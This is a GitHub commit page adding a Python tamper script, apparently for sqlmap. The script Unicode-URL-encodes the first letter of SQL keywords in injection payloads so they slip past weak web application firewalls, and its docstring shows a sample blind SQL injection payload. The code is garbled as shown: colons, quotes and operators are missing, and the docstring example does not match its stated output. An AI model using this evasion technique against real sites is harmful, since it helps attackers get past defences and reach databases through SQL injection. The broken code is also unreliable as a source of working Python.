Skip to content

Commit

Permalink
版本:1.0
Browse files Browse the repository at this point in the history
备注:修改payload中所有sql关键字的首字母为unicode编码。
  • Loading branch information
lxsec committed May 8, 2015
1 parent daa0fff commit bda565f
Showing 1 changed file with 63 additions and 0 deletions.
63 changes: 63 additions & 0 deletions initialunicodeencode.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
#!usrbinenv python


Copyright (c) 2013-2015 xiaol developers (httpxlixli.net)


import os
import string

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage

__priority__ = PRIORITY.LOWEST

def dependencies()
singleTimeWarnMessage(tamper script '%s' is only meant to be run against ASP or ASP.NET web applications % os.path.basename(__file__).split(.)[0])

def tamper(payload, kwargs)

Unicode-url-encodes non-encoded characters in a given payload
(initial)

Requirement
ASP
ASP.NET

Tested against
Microsoft SQL Server 2000
Microsoft SQL Server 2005
MySQL 5.1.56
PostgreSQL 9.0.3

Notes
Useful to bypass weak web application firewalls that do not
unicode url-decode the request before processing it through their
ruleset

tamper('ELECT CONCAT(0x4c584a424c,(SELECT (CASE WHEN (2812=2812) THEN 1 ELSE 0 END)),0x4c5856504c)')
'%u0053ELECT %u0043ONCAT(0x4c584a424c,(%u0053ELECT (%u0043ASE %u0057HEN (1068=1068) %u0054HEN 1 %u0045LSE 0 %u0045ND)),0x4c5856504c)'


retVal = payload

if payload
retVal =
i = 0
first = True
char = True
while i len(payload)
if first and payload[i] in string.letters and char
first = False
retVal += '%%u%.4X' % ord(payload[i])
char = False
elif payload[i] in string.letters and char and payload[i-1] not in string.digits
char = False
retVal += '%%u%.4X' % ord(payload[i])
else
retVal += payload[i]
if payload[i] not in string.letters
char = True
i += 1

return retVal

0 comments on commit bda565f

Please sign in to comment.